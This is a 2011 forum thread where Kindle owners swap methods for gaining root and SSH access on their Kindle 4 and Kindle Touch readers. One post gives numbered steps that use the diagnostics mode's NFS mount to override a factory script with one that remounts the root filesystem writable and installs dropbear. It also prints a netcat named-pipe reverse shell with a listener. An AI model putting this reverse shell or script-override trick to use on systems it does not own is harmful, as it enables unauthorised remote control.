12-08-2011, 10:08 AM | #211 |
Junior Member
Posts: 3
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
For all of you who have already opened up your K4 touch... any of you have the 3g option? Anyone tried swapping sims out for an older 3g "unlimited" kindle? I doubt this will work and it's probably software based on the K4 but I'm curious.
|
12-08-2011, 11:26 AM | #212 |
Kindle Dissector
Posts: 662
Karma: 475607
Join Date: Jul 2010
Device: Amazon Kindle 3
|
Nmap shows no open ports. Also, I've said this before but 3G restrictions is on the kindle itself not based on amazon's servers. It's very easy to bypass.
|
Advert | |
|
12-08-2011, 11:45 AM | #213 |
Member
Posts: 12
Karma: 1126
Join Date: Nov 2011
Device: Kindle Touch
|
Before I crack open my Kindle Touch to access the serial port, has anyone tried to run SSH? One way of doing this is to drop SSH into the user-accessible folders over USB, login to the serial port console, and execute SSH from the console. Does this work?
Secondly, once this is performed, can SSH be integrated into the filesystem permanently, or does that require a new kernel? |
12-08-2011, 03:54 PM | #214 | |
Kindle Dissector
Posts: 662
Karma: 475607
Join Date: Jul 2010
Device: Amazon Kindle 3
|
Quote:
|
|
12-08-2011, 04:28 PM | #215 |
Carpe diem, c'est la vie.
Posts: 6,433
Karma: 10773668
Join Date: Nov 2011
Location: Multiverse 6627A
Device: K1 to PW3
|
Early news: ramirami and dionoea reported having ssh over wifi working on kindle touch now too.
Last edited by geekmaster; 12-08-2011 at 04:57 PM. |
Advert | |
|
12-08-2011, 04:32 PM | #216 |
Enthusiast
Posts: 26
Karma: 300000
Join Date: Dec 2011
Device: kindle 4
|
Hello,
I've found a method to execute an arbitrary shell script using the diagnostics image. This is kind of useless for kindle 4 non touch since we already have an easier method but it may enable access to kindle touch. The instructions are a bit complex. They assume that you know how to use usb ethernet and setup an NFS share. 1. Create a USBnet.xml file in your kindle's root directory (over usb). This file will describe a NFS mountpoint. We will use that functionality to override a script which can be executed by the wifi test item in the diagnostics image. The content of the xml file should look like: Code:
<?xml version="1.0" standalone="no" ?> <!-- USB Net info --> <USB_NetInfo ipNumber="15" device_NFS_path="/opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts" host_NFS_path="/path/to/nfs/share/on/host/" /> 3. Reboot your kindle in diagnostics mode 4. Enable USBnet (see previous post #202 for instructions). If your xml file was properly read you should see something like: ipAddress : 192.168.15.244 netMask : 255.255.255.0 deviceAddr: EE5900000015 hostAddr : EE2900000015 device_NFS: /opt/factory/tools/atheros/art_rel/art/bin/host/support/platformscripts host_NFS : /path/to/nfs/share/on/host/ 5. Configure the network interface to use 192.168.15.201 on your computer. This is the IP address which the kindle will connect to to mount the NFS share. 6. In the same menu section as USBnet, mount the NFS share. 7. This is where things become interesting. On the NFS share, create an executable script called plat_YOSHI-SDIO.sh . Example content could be: Code:
#! /bin/sh PATH=/usr/sbin:/usr/bin:/sbin:/bin mount -o remount,rw / echo "howdy" echo "hey" > /hello.msg echo "here" > /var/local/hello.msg echo "ho" > /mnt/us/hello.msg 9. Reboot and connect as a usb mass storage device. You should now have a hello.msg file. This hasn't been tested on a touch yet but I've had confirmation that the script we're trying to override exists so it seems like a pretty safe bet. Of course my example script is pretty useless. But something like the following script should get you working sshd in the diagnostics image if you can get your hands on a kindle 4 non touch dropbearmulti binary: Code:
#! /bin/sh PATH=/usr/sbin:/usr/bin:/sbin:/bin mount -o remount,rw / cp /mnt/us/dropbearmulti /usr/local/bin/ mkdir /usr/local/sbin ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbear ln -sfn /usr/local/bin/dropbearmulti /usr/local/sbin/dropbearkey mkdir /etc/dropbear /usr/local/bin/dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key On the host computer run: Code:
nc -l -p 1234 Code:
#! /bin/sh PATH=/usr/sbin:/usr/bin:/sbin:/bin cd /tmp mknod in p nc 192.168.15.201 1234 0< in | sh > in 2>&1 Once the script is run you should be able to run commands from the host as if on a normal shell (albeit without a prompt). For example running "find /" should output the full file listing. I'd love to have feedback from touch owners. Last edited by dionoea; 12-09-2011 at 08:37 AM. Reason: Add reverse shell idea |
12-09-2011, 04:29 AM | #217 |
Junior Member
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
i happen to find 4.0.1 update modified root password of diag image.
@dionoea your method is exactly what i thought about, i also tried mount nfs share of init.d it works on k4 non-touch 4.0.1 |
12-09-2011, 04:57 AM | #218 | ||
Enthusiast
Posts: 26
Karma: 300000
Join Date: Dec 2011
Device: kindle 4
|
Quote:
Quote:
|
||
12-09-2011, 05:01 AM | #219 | |
Junior Member
Posts: 8
Karma: 10
Join Date: Nov 2011
Device: Kindle4
|
howto howto howto !!
Hey seaniko7 / dionoea !
Quote:
Cheers, Karl Last edited by karl_k; 12-09-2011 at 05:03 AM. |
|
12-09-2011, 05:21 AM | #220 | |
Junior Member
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
Quote:
and i made a mistake, nfs share of init.d doesn't work. it was because my sshd survived that update XD |
|
12-09-2011, 05:40 AM | #221 |
wannabe developer
Posts: 192
Karma: 156548
Join Date: Mar 2011
Device: Kindle: 2xKeyboard, Classic, 2xTouch, 2xPW, PW2; Onyx: Boox M92
|
Yup, I'll make a tut, which will also include steps needed for unbricking ( I messed up init.d while forcing it to load usbSerial on start, which obviously caused brick and it was tricky to fix, because recovery kernel won't allow you to export mmcblk0p1 ).
|
12-09-2011, 06:03 AM | #222 |
Junior Member
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
Hi folks,
I try to get SSH on my Kindle 4 non-touch, but fails on usbNet step. When I booting to Diag mode I didnt see "Enable usbNet" item, text on screen from top: Code:
TEQUILA - System Diags ---- 1.0.6.194 --- -1097929848 --- S) Device Settings O) Operator test suite R) Run in Test G) Gas Gause E) 511 T) Power Test H) Adjust battery M) MoviNand N) Misc individual diagnostics Y) ART 11g factory test U) USB device mode D) Exit, Reboot or Disable Diags ------------------ X) Exit - FW RIGHT to exit |
12-09-2011, 06:14 AM | #223 |
Junior Member
Posts: 9
Karma: 10
Join Date: Dec 2011
Location: Uzbekistan
Device: Kindle 4
|
|
12-09-2011, 06:30 AM | #224 | |
Enthusiast
Posts: 26
Karma: 300000
Join Date: Dec 2011
Device: kindle 4
|
Quote:
|
|
12-09-2011, 07:03 AM | #225 |
Junior Member
Posts: 4
Karma: 10
Join Date: Nov 2011
Device: Kindle 4
|
Got it.
Anyone knows how to disable ads? |
|
Similar Threads | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
No Progress bar on the Touch... | grizedale | Amazon Kindle | 13 | 09-29-2011 05:02 PM |
Questions about jailbreaking a Kindle 3 | daviesgeek | Kindle Developer's Corner | 0 | 09-13-2011 02:09 PM |
Touch screen vs keyboard e-ink only | Zarich | Which one should I buy? | 24 | 03-05-2011 06:47 AM |
Which Kindle do I need for jailbreaking? | chas0039 | Kindle Developer's Corner | 6 | 11-10-2010 10:04 PM |